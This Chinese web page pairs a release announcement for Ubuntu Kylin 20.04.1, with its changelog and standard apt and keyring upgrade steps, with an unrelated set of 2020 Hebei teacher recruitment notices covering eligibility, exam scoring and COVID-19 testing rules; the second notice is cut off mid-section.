优麒麟(Ubuntu Kylin)是由麒麟软件公司主导开发的全球开源项目,也是Ubuntu的官方衍生版本,专注于研发“友好易用,简单轻松”的桌面环境。
今年4月份,优麒麟跟随Ubuntu的节奏,也发布了20.04 LTS长期支持正式版,之后根据用户反馈建议,针对存在的问题,先后发布了4次系统更新。
今天,优麒麟20.04.1发布了,这也是该系统的第一个更新镜像,包括x86版本、树莓派版本。
优麒麟20.04.1总共有多达418处更新,包括集成此前四次系统更新的269处修改,进行了全面的安全升级、Bug修复、稳定性提升,比如优化4K支持、3D显示性能提升46%、修复USN-4432-1(GRUB 2漏洞)、应用商店持续上新等。
10月22日,优麒麟20.10也将随同Ubuntu 20.10正式发布。
功能改进与BUG修复一览:
- 开始菜单
新增自适应透明度变化;
新增国际化翻译文件安装至本地;
修复软件列表部分软件图标缺失问题;
修复开始菜单响应win快捷键问题;
- 文件管理器
新增进度动画,重构文件操作界面;
新增格式化功能;
新增常用快捷键(切换视图模式,改变图标大小,关闭全部窗口,拖动文件复制等);
新增卸载应用后,自动删除其对应桌面快捷方式;
修复桌面图标重叠,刷新显示异常等问题;
修复升级失败的包依赖问题;
修复开机首次打开计算机卡顿问题;
修复文件名包含部分特殊字符显示异常的问题;
修复用户反馈的列表视图下排序问题;
修复列表视图下,只能选中文件名拖动文件,拖动文件变复制,取消全选困难问题;
修复卸载光盘,光驱不能自动弹出问题;
修复设置禁用缩略图不能马上生效问题;
修复取消窗口置顶不生效问题;
修复重命名文件不能自动选中右括号问题;
修复不能创建与文件夹同名文本文件问题;
修复直接从回收站拖动文件复制到其他路径问题;
修复进入无权限文件夹一直转圈问题;
优化桌面底层代码,图标布局更加合理与稳定;
优化搜索体验,一键切换退出搜索,清空关键词后显示全部文件,添加WPS文件分类筛选;
- 文件管理器插件
新增peony-admin插件;
修复侧边栏挂载设备状态不一致问题;
优化计算机界面,离线即时刷新;
- 任务栏
新增任务栏跟随控制面板透明度变化;
修复更改鼠标主题后任务栏不生效;
修复日历界面周数显示错误;
修复更改系统时间后点击两次日历才更新时间;
修复锁定任务栏之后右键系统监视器无法打开;
修复低分辨率时日历显示在任务栏之上;
修复日历界面无圆角;
修复无法自动刷新gsetting问题;
优化4K支持;
- 控制面板
新增双击窗口顶部放大缩小功能;
新增鼠标双击间隔设置;
新增电源、盒盖设置;
新增无操作变暗设置;
修复多次恢复默认字体导致界面卡死;
修复设置锁屏壁纸在登录页面无效;
修复锁屏预览模糊;
修复从其他屏保切换到默认屏保后预览卡住未更新;
修复登录云账户后,屏保时间和壁纸设置不会自动同步;
修复高频率删除用户时导致控制面板崩溃;
修复无法设置头像,深色模式部分下拉框无选中效果;
修复最大化再恢复后,用户模块显示异常无法删除用户;
修复保留删除用户方式重新建立相同用户无法登录;
修复物理机设置屏幕配置重启不生效;
修复对于acc等格式的音乐文件选择打开默认应用无效;
修复打开时间和日期的时区地图未置顶;
修复高分屏下时间和日期的世界地图显示错误;
修复英文环境下CPU占用率高;
修复光标无法恢复默认;
修复新装系统选择时区与控制面板不一致;
修复台式机打开控制面板弹出插入网卡提示;
修复QWidgetlist无选中效果;
修复QCombox激活状态无边框;
- 软件商店
新增奇安信浏览器;
升级百度网盘;
升级WPS办公软件;
升级亿图项目管理软件;
升级极点五笔;
升级VSCode;
- 守护程序
新增4K缩放机制,支持GTK图标缩放;
修复触摸屏屏幕旋转时,鼠标位置和触点不匹配;
修复鼠标定位与快捷键冲突;
修复鼠标主题,设置为黑色,部分程序偶发不生效;
- 云账户
修复壁纸注销后重启丢失;
修复统一用户中心以及界面内部代码错误;
优化网络速度慢时的交互;
优化UI界面;
- 会话管理
新增关机界面键盘支持;
新增关机界面低分辨率时重新布局;
新增关机界面壁纸跟随桌面壁纸变化;
修复在关机界面执行关机/重启,授权验证无法输入密码;
修复inhibit阻止关机后,session仍会注销;
优化开机启动,去掉重复拉起;
- 主体框架
修改毛玻璃开启的协议;
修复右击菜单不可用字体颜色;
- 麒麟助手
新增主窗体的边框阴影;
修复CPU策略管理提示框异常;
修复无法打开麒麟应用商店;
- 麒麟影音
新增点击音量滑动条控件修改音量大小;
新增4K屏幕显示支持;
新增窗口最小化再恢复后,保存最小化之前的窗口状态;
修复从播放列表中删除当前未播放文件导致的视频切换;
修复最小化后视频暂停播放;
优化界面上工具栏的图标;
优化全屏模式下自动隐藏标题栏和工具栏;
- 窗口管理器
3D性能提升46%;
- 用户手册
修复主页英文状态下的应用名称异常;
修复4K屏上图片不显示;
修复主页面应用板块显示卡顿;
- U盘管理工具
新增空光盘和普通光盘的分类识别;
新增跟随控制面板透明度调节;
修复未同步通过文件管理器卸载的移动设备;
- 搜狗输入法
新增4K屏显示支持(状态栏和输入法窗口);
修复已知五笔显示等bug;
- 电源管理
新增跟随控制面板透明度变化;
优化适应毛玻璃;
优化4K支持;
移除dbusglib的依赖;
- 声音管理
新增跟随控制面板透明度变化功能;
新增设置提示音开关;
修复切换网易云音乐至下一首时,应用音量自动减少;
修复打开控制面板导致系统无声音;
优化4K支持;
- 系统监视器
新增方法进程网络使用情况功能;
新增跟随控制面板透明度调节;
- 系统主题
新增声音、扫描仪、软件中心三款app图标;
新增google完整尺寸图标;
修复上百款图标在深色主题下无法识别;
修复文件夹及快捷菜单中的链接图标显示异常;
修复4K下的文件管理器中标签关闭按钮显示异常;
修复在桌面对文件夹、视频缩放时图标显示异常;
修复任务栏U盘图标模糊;
修复音频播放器界面中图标显示异常;
修复网络邻居与网络链接图标不匹配;
优化主题结构文件,删除512尺寸图标;
优化天气系列图标为彩色图标;
- 侧边栏
新增跟随控制面;板透明度变化;
修复剪贴板无滑动条时,鼠标悬浮剪贴条目按钮未显示;
优化文件和目录名称;
优化插件加载路径;
优化4K支持;
- 便签本
新增系统主题适配;
新增清空便签功能;
新增边框阴影效果;
修复时间显示不全问题;
修复黑色主题下menu图标丢失;
修复清空后计数不更新;
修复拖动重叠;
优化4K支持;
- 工作区
修复背景图片不跟随桌面变化;
修复处在非第一个工作区时,打开多任务视图会闪现第一工作区视图;
修复在多任务视图中选择工作区,退出视图后工作区不会切换;
- 网络工具
新增跟随控制面板透明度变化;
新增毛玻璃效果自启;
修复树莓派版本中有线网络无法连接;
修复有线网自动分配ip时,连接网络显示与ifconfig相同的ipv4与ipv6;
修复WiFi连接后再关闭WiFi,托盘仍显示WiFi连接;
修复在新建有线网络后,有线网界面未出现新增网络项;
修复部分笔记本电脑无法开启WiFi开关;
优化UI效果;
- 麒麟天气
修复按下Alt+F8,并拖动鼠标调整窗口大小,页面内容显示不完整;
- 闹钟
修复日期全部勾选取消会导致闹钟卡死;
优化4K支持;
用户反馈
优化4K支持;
上游更新:
https://wiki.ubuntu.com/FocalFossa/ReleaseNotes/ChangeSummary/20.04.1
版本详情:
http://distrowatch.com/table.php?distribution=ubuntukylin
更新方式:
1、通过官网下载20.04.1镜像安装:
x86下载:
https://www.ubuntukylin.com/downloads/download.php?id=73
树莓派下载:
https://www.ubuntukylin.com/downloads/download.php?id=75
2、从优麒麟官网下载安装20.04的用户直接升级:
$ sudo apt update
$ sudo apt full-upgrade
3、从低版本升级至20.04的用户,安装密钥包后升级:
a)下载密钥包(此步骤只需执行一次,已添加过的用户,跳过此步):
UKUI源:
https://github.com/ukui/ukui-keyring/releases/download/v2020.04.25/ukui-keyring_2020.04.25_all.deb
第三方软件源:
https://github.com/UbuntuKylin/kylin-software-keyring/releases/download/v2020.04.25/kylin-software-keyring_2020.04.25_all.deb
b)安装密钥包(此步骤只需执行一次,已添加过的用户跳过):
$ cd ~/下载
$ sudo dpkg -i ukui-keyring_2020.04.25_all.deb kylin-software-keyring_2020.04.25_all.deb
c)更新:
$ sudo apt update
$ sudo apt full-upgrade
招聘速览
>唐山幼儿师范高等专科学校2020年高层次人才公开招聘公告
>衡水市桃城区二O二0年度公开招聘教师公告
>涿州市技师学院公开选用政府购买服务教师公告
>迁安市富民劳务派遣有限责任公司关于公开招聘教育系统劳务派遣工的公告
>2020年泊头市公开招聘合同制教师公告
>河北孟村回民中学2020年教师选聘实施方案
>承德高新区2020年公开招聘教师公告
>盐山县职教中心2020年公开招聘教师公告
>盐山中学关于2020年公开招聘教师公告
>石家庄市新华区教育局2020年公开招聘派遣制教师公告
唐山幼儿师范高等专科学校2020年高层次人才公开招聘公告
根据《事业单位人事管理条例》(国务院第652号令)、中组部办公厅人社部办公厅《关于应对新冠肺炎疫情影响做好事业单位公开招聘高校毕业生工作的通知》、教育部办公厅等五部门《关于进一步做好非全日制研究生就业工作的通知》(教研厅函[2019]1号)、《河北省事业单位公开招聘工作人员暂行办法》(冀人社发〔2011〕9号)文件精神,为满足我单位对高层次人才的需要,经上级批准,拟采取选聘方式面向社会公开招聘事业编制人员12名,现公告如下:
一、单位基本情况
唐山幼儿师范高等专科学校是2016年2月经河北省人民政府批准、国家教育部备案的全日制公办普通高等专科学校,是一所拥有百年历史的冀东名校,学校隶属于唐山市政府,由唐山市教育局主管,属于全额拨款事业单位,主要为社会培养合格的幼儿园及中小学教师。
二、招聘原则和招聘方式
坚持德才兼备,民主、公开、竞争、择优,实行公开招聘,在测评、考核的基础上择优聘用。
本次公开招聘事业单位工作人员12名,其中选聘9名,统一招聘3名。根据岗位不同采取选聘和统一招聘两种方式。按照制定方案、发布公告、网上报名、资格复审、笔试、面试、体检、考核、拟聘人员公示、聘用等程序进行。岗位1——9为“选聘”,其中:理论类岗位(专技岗位1、2、6、7)采取面试(答辩和说课)的方式进行,技能类岗位(专技岗位3、4、5、8、9)采取面试(答辩、说课和技能测试)的方式进行;岗位10——12为“统一招聘”,采取笔试和面试相结合的方式进行。
三、招聘条件
(一)应聘人员应具备以下基本条件
1.具有中华人民共和国国籍;
2.遵守宪法和法律;
3.具有良好的品行和职业道德;
4.具有与招聘岗位要求相适应的学历学位、专业、年龄和技能条件;留学回国人员须提供教育部出具的国外学历学位认证书。
5.适应岗位要求的身体条件;
6.具备岗位所需要的其他条件;
7.应聘人员毕业时间截止到2020年7月31日之前。
8.报考校医岗位的,报名时已取得资格证书的需提供与报名岗位要求相一致的资格证书;高校毕业生受疫情影响没有及时取得资格证书的,按照人力资源和社会保障部等七部门有关应对新冠肺炎疫情影响实施部分职业资格“先上岗,再考证”阶段性措施文件的要求,不要求必须提供资格证书,但须在签订聘用合同一年内取得与岗位相适应的资格证书,一年试用期内未取得与报考岗位相应资格证书的,将依法解除聘用合同。
(二)岗位信息表
岗位条件详见《唐山幼儿师范高等专科学校2020年公开招聘高层次人才岗位信息表》(附件)。凡涉及到年龄、工作年限等需要确定时间的,计算日期截止到2020年7月31日。
参加选聘人员须具有硕士研究生及以上学历学位,初始学历(高考后第一学历)须为全日制普通类院校,本科专业须与研究生专业相关相近;参加统一招聘人员须具有本科及以上学历学位,初始学历(高考后第一学历)须为全日制普通类院校。
应聘人员学历底限或以上学历的毕业证书载明的专业名称必须与岗位条件中专业要求一致。《岗位信息表》专业要求为“具体专业名称”的,须一字不差(设定的专业要求带括号的,审核时含括号中的内容;设定的专业要求不带括号的,只审核括号外内容);专业要求为“专业类”的,参考教育部制定的现行高等教育专业目录审核。留学回国人员和其他海外、外国学历学位获得者,其所学专业名称与招聘岗位要求的专业名称不完全一致的,其所学专业课程与招聘岗位专业课程应大体相同。
硕士研究生年龄35周岁及以下是指1984年7月31日之后出生;博士研究生年龄45周岁及以下是指1974年7月31日之后出生,条件特别优秀的,年龄可适当放宽;以此类推。
(三)有下列情形之一的人员不得报考
现役军人、试用期(服务期)内的公务员(参照公务员法管理的工作人员)、2021年及以后毕业的高等院校普通类在读学生。
曾因犯罪受过刑事处罚和被开除公职的人员、失信被执行人,以及法律法规规定不得招聘为事业单位工作人员的其他情形人员。
此外,应聘人员不得报考聘用后即构成回避关系的招聘岗位。回避关系是指《河北省事业单位公开招聘工作人员暂行办法》第四十一条关于“凡与聘用单位负责人员有夫妻关系、直系血亲关系、三代以内旁系血亲或者近姻亲关系的应聘人员,不得应聘该单位负责人员的秘书或者人事、财务、纪律检查岗位,以及有直接上下级领导关系的岗位。聘用单位负责人员和招聘工作人员在办理人员聘用事项时,涉及与本人有上述亲属关系或者其他可能影响招聘公正的,也应当回避”的规定。
四、招聘程序
(一)招聘信息发布
2020年8月7日在唐山事业单位招聘网(www.tssydwzpw.com)、唐山幼儿师范高等专科学校网站(http://www.tsyzh.com)发布招聘信息,包括岗位、人数、条件以及报名、考试安排等。在招聘过程中的重要通知事项,将通过“唐山幼儿师范高等专科学校网站”发布,请应聘人员及时关注。
(二)网上报名(报名邮箱:tsyzrsc@126.com )
1.报名时间:8月8日8:00 -14日17:00。
2.要求:应聘人员须将报名表及相关报名材料投递到指定邮箱tsyzrsc@126.com。每人限报一个岗位,同一专业按限报条件进行报名,具体要求见《岗位信息表》。
“高校毕业生”是指未落实工作单位的国家统一招生的高等院校普通类2018、2019、2020年毕业生(离校时其户口、档案、组织关系仍保留在原毕业学校,或保留在各级毕业生就业主管部门、毕业生就业指导服务中心、各级人才交流服务机构和各级公共就业服务机构)
3.提交报名材料:
(1)公开招聘报名表及简历、本科毕业证书及学位证书复印件、研究生毕业证书及学位证书复印件、身份证(须在有效期内)复印件各一份。
(2)普通类本科和研究生阶段毕业证及学位证扫描件一份;2020年应届毕业生因疫情原因未能如期拿到毕业证和学位证的,最晚于2020年12月31日之前提交毕业证和学位证原件;留学回国和其他海外、外国学历学位获得者,须提供教育部出具的国外学历学位认证书及加盖国家认可翻译机构公章的所学专业课程翻译件、扫描件各一份;
(3)其他能证明岗位条件的复印件。
应聘人员须将报名表及相关报名材料形成压缩文件后投递到指定报名邮箱,邮件主题注明报考岗位、姓名、联系方式(如:专技岗位1 张三 138XXXXXXXX)。
(4)以上材料均需提供原件及复印件再次复核审查。
(三)资格审查
8月15 -16日学校人事部门依照发布的招聘条件对应聘人员材料进行资格审核,通过资格审查的应聘人员进入测评(考试)环节。并在唐山幼儿师范高等专科学校网站(http://www.tsyzh.com)发布通过资格审查的人员名单,未通过资格审查的不再另行通知。
在整个招聘过程中,应聘人员应如实提交有关信息和材料,凡本人填写信息不真实、不完整或填写错误的,责任自负;弄虚作假的,一经查实即取消考试资格或聘用资格。
(四)测评(时间另行通知)
根据疫情防控情况,笔试、面试时间另行通知,通过资格审查人员关注在唐山幼儿师范高等专科学校网站(http://www.tsyzh.com)“公告通知栏”。
1、选聘岗位
(1)理论类岗位(专技岗位1、2、6、7),采取面试方式,面试分为答辩和说课两部分,总成绩实行百分制。总成绩=面试成绩=答辩成绩×20%+说课成绩×80%,总成绩保留2位小数。招聘岗位报考人数与招聘人数不大于5:1的比例进入说课环节。
答辩成绩低于12分,或说课成绩低于48分,或考核总成绩低于60分者取消录用资格。
(2)技能类岗位(专技岗位3、4、5、8、9),采取面试方式,面试分为答辩、说课和技能测试三个部分,总成绩实行百分制。总成绩=面试成绩=答辩成绩×20%+说课成绩×40%+技能测试成绩×40%,总成绩保留2位小数。招聘岗位报考人数与招聘人数不大于5:1的比例进入说课和技能测试环节。
答辩成绩低于12分,或说课成绩低于24分,或技能测试成绩低于24分,或考核总成绩低于60分者取消录用资格。
2、统一招聘岗位(专技岗位10---12),测评分笔试和面试两部分,总成绩实行百分制。总成绩=笔试成绩×40%+面试成绩×60%,总成绩保留2位小数。
笔试成绩低于24分,或面试成绩低于36分,或考核总成绩低于60分者取消录用资格。招聘岗位报考人数与招聘人数不大于5:1的比例进入面试环节。
3、开考比例
(1)“统一招聘”岗位,报考人数与招聘人数的比例不低于2:1,对达不到比例的岗位,取消该岗位的招聘计划,通知考生放弃报考。
(2)“选聘”岗位,不限开考比例。
4、测评工作步骤:
(1)组织面试。答辩由选聘工作领导小组指定评委不少于7人,采取赋分的方法,对应聘人的仪表仪态、沟通交流、职业认知、心理品质分别赋分。赋分表当场密封并交选聘领导小组办公室。说课和技能测试,由招聘测评组组织评委(不少于7人),采取赋分的办法,对应聘人员的专业素质和技能进行考核。
(2)笔试。笔试内容为专业基础知识,由学校指定专家出题,采用闭卷考试方法,考试时限为120分钟,满分为100分。笔试期间不得提前离场,不得携带各类电子设备(如:手机、计算器等)。考试不指定考试辅导用书。
5、核算、公布成绩并予以公示。学校招聘领导小组办公室在市教育局高层次人才公开招聘工作领导小组和学校纪检监察处的监督下,分别对各项成绩进行登统、核算、汇总、公布并公示。
成绩核算方法:笔试成绩按卷面实际得分折合成40%计入总分,答辩、说课、技能测试采取去掉1个最高分,去掉1个最低分,再取平均分的方法核算各项分值,计入总分。
(五)体检
测评(考试)结束后,按体检人数与聘用人数1:1的比例,依据应聘人员总成绩从高分到低分确定体检人选。如比例内末位应聘人员总成绩出现并列,答辩成绩高者优先。体检项目和标准参照《公务员录用体检通用标准(试行)》执行,体检费用自理。体检不合格取消拟聘资格,出现岗位空缺,由同一岗位总成绩的下一名递补。
(六)考核
对拟聘用人员的政治思想表现、道德品质、业务能力、工作实绩等情况,做出“合格”或“不合格”结论。考核不合格的取消应聘资格。
考核不合格人选,取消拟聘人选资格,并从应聘同一岗位的人员中按总成绩从高分到低分依次递补,对递补人选要进行考核。
(七)公示
考核完成后,将考核结果和拟聘用人员信息报市人力资源和社会保障局事业单位人事管理处,并在唐山幼儿师范高等专科学校网站(http://www.tsyzh.com/)进行公示,公示期不少于7个工作日。拟聘人选公示的结果影响聘用及放弃聘用的,出现岗位空缺,由同一岗位总成绩的下一名递补。
(八)聘用
拟聘人选确定后,选聘单位提出聘用意见,填写《河北省事业单位公开招聘工作人员审批表》一式三份,连同选聘情况报告、拟聘人员名册报市人力资源和社会保障局办理相关审批手续。被聘用人员按相关政策规定实行试用期,试用期一并计算在聘用合同期限内。试用期满考核合格的,予以正式聘用,不合格的,取消聘用。
选聘工作各环节具体时间,应聘人员可查询唐山幼儿师范高等专科学校(http://zzrs.tsyzh.com/)。对于公告所规定的时间和其他相关事宜如有变动,以临时通知为准,请应聘人员随时关注唐山幼儿师范高等专科学校网站,并保持电话畅通,以便工作人员能够及时联系,接受电话通知。
五、疫情防控
(一)为了做好选聘期间疫情防控工作,应聘人员对个人健康状况填报实行承诺制,应聘人员须于开始现场测评前分别填报《个人健康信息承诺书》,承诺填报内容真实、准确、完整,凡隐瞒、漏报、谎报旅居史、接触史、健康状况等疫情防控重点信息的,取消选聘资格。测评时须持携带有效期内法定身份证件(二代身份证、临时身份证或护照)和《个人健康信息承诺书》(附件3),方能进入考场。
(二)应聘人员进入考场前一律出示“河北健康码”(应聘人员报名成功须申领“河北健康码”。申领方式为:通过微信搜索“冀时办”登录“河北健康码”,按照提示填写健康信息,核对并确认无误后提交,自动生成“河北健康码”。),佩戴口罩,检测体温,核验身份。“河北健康码”为绿码且体温检测正常的,方可进入考场。
测评前14天内有国内疫情中高风险地区(含风险等级调整为低风险未满14天的地区)或国(境)外旅居史的应聘人员,如“河北健康码”为绿码的,如无发热、干咳等症状的,须提供测评前7天内核酸检测阴性证明方可参加测评;如有发热、干咳等症状的,须再提供1次测评前48小时内核酸检测阴性证明方可参加测评。“河北健康码”为红码或黄码的,要按照防疫有关要求配合进行隔离医学观察或隔离治疗。此类人员如要参加测评,应于测评前14天抵达滦州,且期间不得离开滦州,并按照疫情防控措施纳入管理,进行健康监测出具2次核酸检测阴性报告后,均无异常方可参加测评。
既往新冠肺炎确诊病例、无症状感染者及密切接触者,现已按规定解除隔离观察的应聘人员,应当主动报告,且持河北健康码“绿码”方可参加测评。
按照疫情防控要求和上述提示无法提供相关健康证明的应聘人员,不得参加测评。因执行防疫规定需要进行隔离观察或隔离治疗,无法参加测评的应聘人员,视同放弃应聘资格。
(三)测评开始时,体温检测异常者不得参加测评。
(四)应聘人员除验证身份时,现场确认及测评全程佩戴口罩。
(五)应聘人员进入考场时,严格控制入场速度,加大人员间距,防止人员聚集;测评期间,在考场内应聘人员座位间隔应1米以上;测评结束,应聘人员须在工作人员指引下,尽快离开考场,避免聚集。
六、组织机构
为加强对本次招聘工作的领导,确保招聘工作规范有序进行,唐山幼儿师范高等专科成立招聘工作领导小组办公室,并在市教育局招聘工作领导小组指导下开展工作。招聘工作领导小组办公室负责招聘工作的组织和管理,对招聘工作的公开、公平、公正、安全及保密负总责,并负责招聘工作的具体组织实施;办公室下设纪检监察组,负责整个招聘过程的监督和检查工作。
七、其他事项
本方案由唐山幼儿师范高等专科学校组织人事处负责解释。
联系人:郑老师:1563337639 王老师:15030588106
办公电话:0315-7312977
电子邮箱: tsyzrsc@126.com
详情登录
http://www.tssydwzpw.com/web/wenjian/20200807150338.html
衡水市桃城区二O二0年度公开招聘教师公告
为满足用人需要,经研究决定,面向社会公开招聘教师。现就有关事项公告如下:
一、招聘原则
坚持“公开、平等、竞争、择优”的原则,按照德才兼备的用人标准,面向社会,公开招考,择优聘用。
二、招聘数额和岗位
衡水市桃城区2020年度公开招聘教师257人,每人限报考一个岗位,详见“桃城区2020年度公开招聘教师岗位表”。招聘人员享受全额事业单位工资福利待遇,纳入编制管理。
招聘岗位分为180个普通岗位、77个“服务基层项目计划”岗位。
符合报名条件的考生都可以报考普通岗位,普通岗位有效报考人数与招聘人数之比原则上不能低于3∶1,达不到这一比例的,减少该岗位招聘人数直到符合比例要求或取消该岗位的招聘计划,相应报名人员调剂岗位。不服从调剂者视为放弃报考资格。
“服务基层项目计划”岗位仅限符合岗位条件且服务期满(时间截至2020年8月10日之前,含8月10日)考核合格的服务基层项目计划人员(“选聘高校毕业生到村任职工作(大学生村官)”“农村义务教育阶段学校教师特设岗位计划”、高校毕业生“三支一扶计划”“大学生村医计划”“大学生志愿服务西部计划”)报考。此类岗位有效报考人数与招聘人数之比原则上不能低于3∶1,考生的笔试成绩、总成绩均不得低于同一学科普通岗位最后一名入围面试考生笔试成绩、最后一名拟聘用考生总成绩10分以上(含10分)且均不得低于划定的笔试成绩、面试成绩、总成绩的最低合格分数线(60分)。如果某“服务基层项目计划”岗位达不到开考比例或无达到分数要求者,则该岗位转为普通岗位,报名考生相应自动转为普通考生身份。
三、招聘范围和基本条件
(一)招聘人员范围
1.2020年毕业的全日制普通高校毕业生;
2.衡水市户籍(含就业报到证派往衡水市;含户口迁移证派往衡水市。此衡水市包括衡水市所属各县、市、区)往届毕业的全日制普通高校毕业生。以上相关证明材料的日期以报名首日(2020年8月10日)及之前有效。
岗位有其他要求的以岗位要求为准,详见《桃城区2020年度公开招聘教师岗位表》。
(二)应聘人员基本条件
1.具有中华人民共和国国籍,遵守宪法和法律,具有良好的政治素质和道德品行。
2.拥护中华人民共和国宪法,拥护中国共产党领导和社会主义制度。
3.身体健康,出生日期在1985年8月10日(不含)至2002年8月10日(含)之间。
4.具有与招聘岗位要求相适应的条件。
5.实行“先上岗、再考证”阶段性措施。凡符合教师资格考试报名条件和教师资格认定关于思想政治素质、普通话水平、身体条件等要求的高校毕业生,可以先上岗从事教育教学相关工作,再参加考试并取得教师资格。单位与先上岗的高校毕业生签订聘用合同,试用期1年。聘用合同条款中明确先上岗的高校毕业生在2年内未取得相应职业资格的,依法解除聘用合同,终止人事关系。
此处所指“高校毕业生”包括应届高校毕业生和择业期内未落实工作单位的高校毕业生。择业期内未落实工作单位的高校毕业生是指,国家统一招生的普通高校毕业生离校时和在择业期内(国家规定择业期为二年,本次招聘是指截至报名首日报到证签发时间不满二年尚未落实工作单位的普通高校毕业生)未落实工作单位,其户口、档案、组织关系仍保留在原毕业学校,或保留在各级毕业生就业主管部门(毕业生就业指导服务中心)、各级人才交流服务机构和各级公共就业服务机构的毕业生。
其他符合报名条件人员必须持有教师资格证且教师资格证的任教学科符合岗位要求。
报考高中学科岗位、职教中心学科岗位和小学音乐、体育、美术学科岗位的考生所持教师资格证(包括聘用2年内所取得的教师资格证)必须是相应学科。其他学科岗位不限制教师资格证的学科。
已通过教师资格考试暂未发证的,需提供合格成绩单。
6.因犯罪受过刑事处罚的人员、被开除中国共产党党籍的人员、受到党纪政纪处分的人员、被开除公职的人员、被依法列为失信联合惩戒对象的人员、在各级公务员和事业单位招考中被认定有舞弊等严重违反录用纪律行为的人员、公务员(包括参照公务员法管理的工作人员)和事业单位工作人员被辞退未满5年的,以及法律法规规定不得招聘为事业单位工作人员的其他情形人员,不得报考。
7.现役军人、机关工作人员和事业单位工作人员、全日制普通高校在读学生不在招聘范围。
此外,应聘人员不得报考聘用后即构成回避关系的招聘岗位。聘用单位负责人员和招聘工作人员在办理人员招聘事项时,涉及与本人有亲属关系或者其他可能影响招聘公正的,也应当回避。
四、招聘办法和程序
1.成立公开招聘教师工作领导小组,负责对招聘工作的领导和监督,确保公开、公平、公正。
2.本次招聘实行网上报名、网资格审查。
3.考试采取笔试和面试的方式进行,笔试委托第三方命题并阅卷,面试按相关规定委托第三方安排异地考官进行。
4.体检、考察政审、公示、聘用。
五、报名、资格审查
报名网址:桃城区事业单位招聘考试网http://121.17.168.183:81。
报名时间:2020年8月10日09:00至8月14日17:00。
缴费时间:2020年8月10日09:00至8月15日12:00。通过资格审查者缴纳考务报名费100元。
打印准考证时间:2020年8月16日09:00至8月17日17:00。
网上报名的基本程序:
1.考生开始报名前,须完全了解本次招聘政策和拟招聘岗位条件,认真阅读本公告并同意《诚信承诺书》《疫情防控个人健康信息承诺书》,然后按步骤进行具体操作。
2.考生网上报名实行严格的自律制度,必须承诺履行《诚信承诺书》《疫情防控个人健康信息承诺书》,对提交审核的报名信息的真实性负责,在任何环节,凡发现网上填报的信息与实际情况不一致的,取消该考生应聘资格。
3.考生网上报名须使用有效期内的二代居民身份证申请“报名号”,并选择报考职位,获取“报名号”和“初始密码”后才能登录报名系统,进行填表和提交审核,报名号是登录报名系统的唯一标识,密码可修改,请考生务必牢记并保管好自己的报名号和密码。
4.考生要按规范填写或选择表项,照片信息要求上传本人近期1寸免冠证件照。照片为白色、蓝色或红色的纯色背景,照片头部占照片尺寸的2/3,人像清晰,神态自然,无明显畸变。报考信息通过审核后才能进行缴费操作,缴费成功即完成报名。
尚未取得教师资格证书,但已经通过教师资格考试笔试、面试取得《中小学教师资格考试合格证明》,并且符合其他招聘条件的应聘考生,在报名信息“教师资格种类”和“教师资格任教学科”项选择《中小学教师资格考试合格证明》中的考试类别,在“教师资格证书编号”项填写《中小学教师资格考试合格证明》编号。
5.考生“提交审核”后信息将被锁定,在未反馈审核结果前不能修改。一般情况下,审核员24小时内会在报名系统上回复审核结果。“审核未过”的,可根据提示的未过原因,修改信息或改报岗位并重新提交审核;“审核通过”的,将不能再修改,进入缴费程序。
6.考生网上支付。请考生及时开通网上支付功能。审核通过的考生,按照网上提示步骤进行报名考务费的支付。支付过程中要耐心,按照页面提示逐步操作,不要轻易关闭支付页面。
报名考务费减免对象包括:建档立卡贫困家庭考生和城乡低保家庭考生。具体流程为:先行报名缴费→提交审核材料→审核通过→退费。建档立卡贫困家庭的考生将本人身份证和扶贫手册拍摄为照片格式(内容要清晰可见),城乡低保家庭的考生将本人身份证和其家庭所在地的县(市、区)民政部门出具的享受最低生活保障的证明或低保证拍摄为照片格式(内容要清晰可见),连同个人联系方式(手机号码),在8月15日前发送至电子邮箱:tcqrsjrmk@163.com。经审核符合减免的,报名考务费将于缴费结束后原途径返还至缴费账户。
7.考生务必牢记报名和缴费截止时间、打印《笔试准考证》时间等重要时间信息,凡是在规定时间内未完成相关操作的,将被视为自动放弃资格。同时,考生报名和考试期间务必保管好个人的证件和信息,因个人原因造成信息丢失、被他人盗用、被恶意篡改而影响报名和考试的,责任自负。
8.考生所留联系电话务必保持联络畅通。请考生在进行网上填报时,务必填写本人常用联系方式,确保在招聘各个环节保持手机等通讯设备畅通,因通讯不畅影响报名、考试、体检、考察政审、办理聘用手续等事宜的,责任自负。
9.打印《笔试准考证》。应聘考生完成网上报名审核缴费后,应于规定时间内登录桃城区事业单位招聘考试网“打印准考证”专栏打印《笔试准考证》。
报名开始和结束时容易出现网络拥堵,建议考生合理安排报名时间,尽量避开高峰期报名、缴费。
请考生特别注意:多名考生使用同一台电脑报名时,每位考生报名完成后一定要点击退出系统按钮,关闭所有显示本人信息的填报页面,禁止同时打开两个或两个以上页面,以免发生错误。
六、划定最低合格分数线。本次教师招聘笔试、面试、综合成绩的最低合格分数线均为60分,达不到最低合格分数线的考生取消其应聘资格。
七、笔试
本次考试不指定考试辅导用书,不举办也不委托任何机构或个人举办考试辅导培训班。目前社会上出现的假借事业单位招聘考试命题组、专门培训机构等名义举办的辅导班、辅导网站或发行的出版物等,均与本次考试无关。敬请广大应聘者提高警惕,切勿上当受骗。
考生凭《笔试准考证》《新冠肺炎疫情防控诚信承诺书》和有效期内的二代居民身份证原件参加笔试考试,缺少证件的考生不得参加考试。笔试为闭卷考试。
考生对个人健康状况填报实行承诺制,承诺填报的《新冠肺炎疫情防控诚信承诺书》内容要真实、准确、完整,凡隐瞒、漏报、谎报旅居史、接触史、健康状况等疫情防控重点信息的,记入事业单位招聘考试诚信档案,并依规依纪依法处理。
考生进入考点后,需全程佩戴符合防护要求的医用外科口罩,仅在入场核验身份时可以暂时摘下口罩。考生须听从考点工作人员指挥,分散进入考场,进出考场、如厕时均须与他人保持1米以上距离,避免近距离接触交流。
笔试内容:科目一为公共基础知识,科目二为教育法规、教育学、教育心理学等专业知识。
满分为100分,考试时间120分钟,笔试成绩按60%权重记入总分。
笔试时间、地点、注意事项等以笔试准考证为准。
根据笔试总成绩和招聘计划,分岗位从高分到低分按不高于2:1的比例确定进入面试人选,比例内末位笔试成绩并列的都进入面试。
八、面试
1.面试资格复审
2020年应届毕业的全日制普通高校毕业生持以下证明材料:(1)有效期内的二代居民身份证;(2)毕业证、就业报到证;(3)已经取得教师资格证或考试通过暂未发证的,提供教师资格证或相关教师资格认定机构出具各项成绩考试合格的证明。未取得的不必提供;(4)其他证明材料;以上材料均需提供原件和复印件(A4纸)一份。
